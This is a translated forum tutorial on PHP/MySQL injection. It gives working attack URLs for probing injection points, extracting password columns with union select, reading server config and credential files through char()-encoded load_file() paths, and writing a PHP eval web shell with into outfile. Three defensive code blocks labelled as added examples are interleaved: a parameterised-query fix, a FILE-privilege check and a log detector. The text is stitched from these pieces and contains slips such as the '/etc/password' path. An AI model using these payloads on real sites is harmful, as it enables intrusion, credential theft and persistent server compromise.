xTremeSurfer

PHP injection tutorial!


Injection is popular these days, and plenty of rookies just carry tools around. If you do not want to be a slave to your tools, do not want to shy away from PHP, do not want to stay in the crowd of ASP rookies, do not want to... then stop here and follow me through the whole process of intrusion detection. I believe you will gain something, not only technically but, more importantly, in your way of thinking and your awareness.

Determining whether an injection point exists: First, judging injection in PHP works the same way as in ASP. Append and 1=1 and then and 1=2 to the dynamic parameter and compare the results that come back. If the two results differ, the parameter can provisionally be judged an injection point.

Determining the number of fields: Next, to guess the number of fields in PHP we use order by. Syntax:

code: http://127.0.0.1/1.php?id=1 order by 40 // If the page returns normally, the real number of fields is at least 40, so we keep increasing the number until an error is returned.

code: For example, when http://127.0.0.1/1.php?id=1 order by 44 returns normally and order by 45 gives an error, we know the number of fields is 44.

union select: Once we know the number of fields, we use a union select query to list all of the fields.

code: http://127.0.0.1/1.php?id=1 and 1=2 union select 1,2,3,4 ~ 44 /* // Here we list the 44 fields (~ stands for the numbers left out), and with /* we tell MySQL that our statement ends here.

The numbers that get echoed on the page mark the usable positions. Replace such a number with the name of the field you want to query, add the table after from, and you get the contents of that field. For example:

code: http://127.0.0.1/1.php?id=1 and 1=2 union select 1,2,3,4,~30,passwd,32,~45 from member /* // ~ stands for the numbers I have omitted here; write them out in full.
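Added example, not part of the original post: the query-building bug behind the 1=1/1=2, order by and union select steps above, beside the parameterised fix, with the tutorial's three probes run against both so you can see what an observer learns in each case. sqlite3 stands in for MySQL so the block runs offline; the tables and rows are constructed sample data.

```python
import sqlite3

# Constructed sample schema: a news table queried by id (like 1.php?id=)
# and a member table holding the data the union probe goes after.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER, title TEXT, body TEXT)")
    db.execute("INSERT INTO news VALUES (1, 'hello', 'first post')")
    db.execute("CREATE TABLE member (id INTEGER, name TEXT, passwd TEXT)")
    db.execute("INSERT INTO member VALUES (7, 'admin', 'hunter2')")
    return db

def lookup_vulnerable(db, raw_id):
    # The bug: the request value is pasted into the SQL text, so
    # 'and 1=2', 'order by N' and 'union select' are parsed as SQL.
    sql = "SELECT id, title, body FROM news WHERE id=" + raw_id
    return db.execute(sql).fetchall()

def lookup_fixed(db, raw_id):
    # The fix: validate the shape of the value, then bind it as a
    # parameter so the database never parses it as SQL.
    if not raw_id.isdigit():
        raise ValueError("id must be a positive integer")
    sql = "SELECT id, title, body FROM news WHERE id=?"
    return db.execute(sql, (int(raw_id),)).fetchall()

def probe(lookup, db):
    """Run the tutorial's probes against a lookup function and report
    what an observer sees: whether 1=1 and 1=2 give different pages,
    the column count found with order by (None = nothing learned), and
    the rows a union select exposes (None = error or rejected)."""
    def run(value):
        try:
            return lookup(db, value)
        except (sqlite3.Error, ValueError):
            return None
    differs = run("1 and 1=1") != run("1 and 1=2")
    columns = None
    for n in range(1, 10):
        if run(f"1 order by {n}") is None:
            columns = n - 1 if n > 1 else None
            break
    union = run("1 and 1=2 union select id,name,passwd from member")
    return differs, columns, union
```

With the fixed lookup every probe is rejected before reaching the database, so the two test pages are identical and nothing about the column count or other tables leaks.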

A few commonly used MySQL functions: Now that we can list the fields, I expect most people are in a hurry to guess the password at this point. In fact, guessing the password is a trick we should leave for the end. Some say MySQL has functions like those of Access, or even fewer; this is a misunderstanding that does MySQL an injustice. Let's look at what advanced features MySQL offers.

Here are a few commonly used functions first: 1: system_user() 2: user() 3: current_user 4: session_user() 5: database() 6: version() 7: load_file() ... Their meanings are as follows:

1: system user name. 2: user name. 3: current user name. 4: the user name used to connect to the database. 5: database name. 6: database version. 7: the MySQL function for reading local files.

What are they good for? The role of 1 to 6:

The information these functions return plays a very important part in the detection process: understanding the target, analysing it, looking for weaknesses and broadening our thinking. For example, knowing the system version tells us whether the database supports union, and the current user tells us whether we are ROOT, and so on. Function 7 is even more useful, and we cover it separately next.

On the load_file() function and techniques for using it.

OK. load_file is the MySQL function for reading local files; when we have permission to read and write files, load_file is extremely useful. How do we judge the permissions of an injection point? Very simple: append and (select count(*) from mysql.user)>0 /* to the injection point. If the result returns normally, we have read/write privileges. We can then use this function to read sensitive system files: to find configuration files, database connection files, files useful for social engineering, the physical path of the web root, and so on. Below I give you a summary list of sensitive files:

Windows:

load_file(char(99,58,47,119,105,110,100,111,119,115,47,112,104,112,46,105,110,105)) c:/windows/php.ini // I need not say what is inside?

load_file(char(99,58,47,119,105,110,110,116,47,112,104,112,46,105,110,105)) c:/winnt/php.ini

load_file(char(99,58,47,119,105,110,100,111,119,115,47,109,121,46,105,110,105)) c:/windows/my.ini // the MySQL login user name and password the administrator set will be left in here

load_file(char(99,58,47,119,105,110,110,116,47,109,121,46,105,110,105)) c:/winnt/my.ini

load_file(char(99,58,47,98,111,111,116,46,105,110,105)) c:/boot.ini

Linux/Unix:

load_file(char(47,101,116,99,47,112,97,115,115,119,111,114,100)) /etc/password // need I say more?

load_file(char(47,117,115,114,47,108,111,99,97,108,47,104,116,116,112,100,47,99,111,110,102,47,104,116,116,112,100,46,99,111,110,102)) /usr/local/httpd/conf/httpd.conf // the default directory; you may be able to find the site's path here!

load_file(char(47,117,115,114,47,108,111,99,97,108,47,97,112,97,99,104,101,50,47,99,111,110,102,47,104,116,116,112,100,46,99,111,110,102)) /usr/local/apache2/conf/httpd.conf // the default directory; you may be able to find the site's path here!

FreeBSD:

load_file(char(47)) // lists the root directory of the FreeBSD system

A friend who has read this far may ask: what is all this? What is char()? What is the long list of numbers behind it? (If you do not understand the system itself, do not ask; Google it yourself.)

Actually, even if your injection point has read/write permission, if you execute load_file(C:\boot.ini) directly it generally will not echo anything. In that situation you have two options: 1, convert the path to hexadecimal and pass it to the database directly; 2, convert the path to decimal and use the char() function to restore it to ASCII.

For example, c:\boot.ini converted to hex is "0x633A5C626F6F742E696E69", and you can then use load_file(0x633A5C626F6F742E696E69) directly. Converted to decimal it is "99 58 92 98 111 111 116 46 105 110 105". To use that you need char(), and before converting you need to do a bulk replace in your text file, turning the spaces into commas, which gives load_file(char(99,58,92,98,111,111,116,46,105,110,105)). Be careful not to add or drop a number; the two sides must match.

At this point I expect some newbies are calling out: what now, where do I put this to run it?! Don't worry, take a look at the figure.

As long as a field from the load_file() query appears on the page, it is best to make sure its position has enough room to display the complete file you want to show. If the position does not have enough room, here I will teach you the remedy.

1: Sometimes you have clearly confirmed that you have permission to read and write files, yet it just cannot read the file, or the result is blank. Why? One reason may be that the system's permissions are configured well: you have USER permissions, and a file that only ADMINISTRATOR can read you cannot read. Both NTFS and Linux can do this. If you have excluded that, you should consider whether the content you read out is being executed by the browser as HTML, ASP, PHP, ASPX, JSP or some other scripting language. For example, if the content you read out contains <> symbols, the browser will execute the contents of your file and naturally you see nothing. Dealing with this is also very simple: when we read the file out, we replace those special symbols with other symbols so that the browser will not execute them! How? With the replace(load_file(A),char(B),char(C)) function! When file A is read out, any letter or symbol B in it is replaced by MySQL with the letter or symbol C before it is displayed. OK, so we write it like this: replace(load_file(A),char(60),char(32)). The char() function converts the numbers to characters here: 60 is "<" and 32 is a space.

2: When none of the fields has a position with enough room and the file you read out is incomplete, and none of the reasons above applies, what then? Here we use the substring(str,pos,len) function to solve the problem. It returns len characters of the string str starting from position pos. For example, substring(load_file(A),50,100) echoes 100 characters of A's content starting from the 50th character. We can then echo the file piece by piece.

Advanced use: into outfile!

OK, that is enough about load_file(). Next comes the highlight! Here I will describe a very important method; Kim Sum is also why I refer to several works that focus on this technical part. First we have to determine the following conditions:

1: obtain the physical path (into outfile 'physical path'), so that we can write into the directory

2: be able to use union (that is, the MySQL version must be above 3)

3: the other side does not filter ' (because the quotes in outfile '' cannot be replaced with other functions)

4: the MySQL user has the file_priv permission (otherwise files cannot be written, nor their contents read)

5: on Windows the web directory generally has write permission for the system; on Linux it is usually rwxr-xr-x, meaning group and other users have no write permission.

For 1, we can usually rely on database error messages to leak the path; failing that, load_file() can also get it. 2 is generally available; cases where it is not are rare. 3: the ' character. 4: we have already tested whether there is permission filtering. 5: if you cannot find the site path, we have other ways, for example the startup folder, run, and social-engineering approaches; and in general the upload directory, the image directory and the like usually have read and write permission, so try those more.
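Added example, not part of the original post: a defender's check for the MySQL side of the conditions above, condition 4 in particular. It flags accounts that hold the global FILE privilege and reads the secure_file_priv setting, the server variable that confines or disables both load_file() and into outfile (the post does not mention it). The SHOW GRANTS rows and my.cnf lines are constructed samples.

```python
import re

# Constructed SHOW GRANTS output for three accounts (not from a real server).
SAMPLE_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'webapp'@'localhost'",
    "GRANT SELECT, INSERT, FILE ON *.* TO 'report'@'%'",
    "GRANT SELECT, INSERT, UPDATE ON `shop`.* TO 'shop'@'localhost'",
]
# Constructed my.cnf fragment with the weak setting: an empty value.
SAMPLE_MY_CNF = """\
[mysqld]
datadir=/var/lib/mysql
secure_file_priv=
"""

GRANT_RX = re.compile(r"^GRANT\s+(.+?)\s+ON\s+(\S+)\s+TO\s+(\S+)", re.I)

def accounts_with_file_priv(grants):
    """FILE is a global privilege, so it only appears in 'ON *.*' grants,
    either by name or bundled inside ALL PRIVILEGES."""
    risky = []
    for g in grants:
        m = GRANT_RX.match(g)
        if not m:
            continue
        privs = {p.strip().upper() for p in m.group(1).split(",")}
        if m.group(2) == "*.*" and ({"FILE", "ALL PRIVILEGES"} & privs):
            risky.append(m.group(3))
    return risky

def revoke_statements(accounts):
    # A web application account almost never needs FILE; drop it.
    return [f"REVOKE FILE ON *.* FROM {a};" for a in accounts]

def secure_file_priv_status(my_cnf):
    """Empty = load_file/into outfile may touch any path the server can,
    NULL = file operations disabled, a directory = confined to it."""
    for line in my_cnf.splitlines():
        m = re.match(r"^\s*secure[-_]file[-_]priv\s*=\s*(.*?)\s*$", line, re.I)
        if m:
            v = m.group(1).strip("\"'")
            if v == "":
                return "unrestricted"
            if v.upper() == "NULL":
                return "disabled"
            return "confined to " + v
    # Not in this file: the server default applies; confirm with
    # SHOW VARIABLES LIKE 'secure_file_priv'.
    return "not set"
```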

OK. Those are the conditions to determine. Now, how do we use it? We separate it into two usages.

Usage 1: This is the law-abiding usage that we all know. Use the site's message board, upload or similar function to get your one-line shell up, then use

code: http://www.tian6.com/coder.php?id=1 and 1=2 union select 1,load_file( /www/home/html/upload/qingyafengping.jpg),3,4,5,6 into outfile '/www/home/html/coder.php' /* and your shell is born.

Here /www/home/html/upload/qingyafengping.jpg is the address of the trojan you uploaded, 3,4,5,6 are the fields assumed to exist, and /www/home/html/ is the hypothetical web path.

Usage 2 is the key one. The method above still has considerable limitations: if the site does not let you upload, or filters the uploaded content, what then? Don't be afraid; the idea Kenshin came up with several years ago gives us a good way. We only need to execute a URL like this directly:

code: http://tiany6.com and 1=2 union select 1,char(here goes the code of your shell; remember to convert it to decimal or hex),3,4,5,6 into outfile '/www/home/html/coder.php' /* This also gives birth to your shell, with no upload needed and no fear of filtering.

For example

code: http://tiany6.com and 1=2 union select 1,char(60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,99,109,100,93,41,63,62),3,4,5,6 into outfile '/www/home/html/coder.php'/*

Or

tiany6.com and 1=2 union select 1,0x3C3F706870206576616C28245F504F53545B636D645D293F3E,3,4,5,6 into outfile '/www/home/html/coder.php'/*

Or

tiany6.com and 1=2 union select 1,'',3,4,5,6 into outfile '/www/home/html/coder.php'/*

3,4,5,6 are the fields assumed to exist, and /www/home/html/ is the hypothetical web path.
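Added example, not part of the original post: detection logic for the request patterns this tutorial walks through (the 1=1/1=2 test, order by, union select, load_file() and into outfile) run over web-server access-log lines, with a decoder for the char(...) and 0x... literals so an analyst can see which file a request named. The log lines and the host names in them are constructed samples.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not from a real server) replaying the
# tutorial's steps: tautology test, order by, union + load_file, into outfile.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /1.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /1.php?id=1%20and%201=2 HTTP/1.1" 200 230
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /1.php?id=1%20order%20by%2045 HTTP/1.1" 500 90
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /1.php?id=1%20and%201=2%20union%20select%201,load_file(char(99,58,47,98,111,111,116,46,105,110,105)),3/* HTTP/1.1" 200 900
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /1.php?id=1%20and%201=2%20union%20select%201,0x41,3%20into%20outfile%20'/www/home/html/x.php'/* HTTP/1.1" 200 512
"""

SIGNATURES = [
    ("tautology probe", re.compile(r"\band\s+1\s*=\s*[12]\b", re.I)),
    ("column-count probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union enumeration", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("file read", re.compile(r"\bload_file\s*\(", re.I)),
    ("file write", re.compile(r"\binto\s+(out|dump)file\b", re.I)),
]
CHAR_LIT = re.compile(r"\bchar\s*\(\s*([\d\s,]+)\)", re.I)
HEX_LIT = re.compile(r"\b0x([0-9a-f]+)\b", re.I)

def decode_literals(text):
    """Recover the strings hidden in char(...) and 0x... literals so the
    analyst can see which path a payload named."""
    found = [bytes(int(n) for n in m.group(1).split(",") if n.strip())
             .decode("latin-1") for m in CHAR_LIT.finditer(text)]
    found += [bytes.fromhex(m.group(1)).decode("latin-1")
              for m in HEX_LIT.finditer(text) if len(m.group(1)) % 2 == 0]
    return found

def scan_log(log):
    """Return (raw request, matched signatures, decoded literals) for
    every request line that trips at least one signature."""
    findings = []
    for line in log.splitlines():
        m = re.search(r'"(?:GET|POST)\s+(\S+)', line)
        if not m:
            continue
        req = unquote_plus(m.group(1))  # decode before matching
        tags = [name for name, rx in SIGNATURES if rx.search(req)]
        if tags:
            findings.append((m.group(1), tags, decode_literals(req)))
    return findings
```

The order-by line returned a 500 while the union lines returned 200: that status change after a run of probes from one client is itself a useful alerting condition.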

Summary of the basics: Good, I have covered the basics here. When you have time, do some real testing. Of course, a simple question will get a passing answer. Maybe you should ask why I say so much up front, since all of the content above can basically be found online with a careful search. Why repeat it here? I will give you only two answers.

1: I have always advocated really understanding the reasons behind a technique. To know these things you must know why. No two problems are exactly the same, no two targets are exactly the same, and every day things change. To be really handy and to solve difficulties on your own, you must understand the principles! Tools are written by people and can only be your helpers; they will not adapt themselves to the actual environment. If you understand the principles, you become a flexible and intelligent tool yourself, able to innovate and adapt. A person who moves lives, a tree that moves dies; however hard it is, we must always remind ourselves of this.

2: Newcomers without a foundation always find it hard to quickly find information that really helps them. They often spend considerable time and effort, get wrong answers and are led astray, and that is how so many people come to rely on tools. I summarise things here for you so that you learn fast and do not head in the wrong direction. Many people went through this on their own (I believe many experts pondered their way through by themselves, and your hard time is the same). Now that you have come to the Tianyang forum, nobody will charge you a penny, ask you to join any VIP, or ask you to pay for anything. There are many people willing to build a better learning environment for you; our forum administrators and moderators are also shortcuts to help you get on track as quickly as possible. This is a good opportunity for newcomers, and it is the reason I take pains to write these articles. I want to see Tianyang students who are technical, upward-looking, positive and heading in the right direction. OK, enough nonsense; I will not waste the masters' time.

Source: PHP injection tutorial - Hyperblue's Blog - PHP MYSQL|Web Development|Plug-in Development|typo3|WordPress|magento|opencart|dedecms|discuz
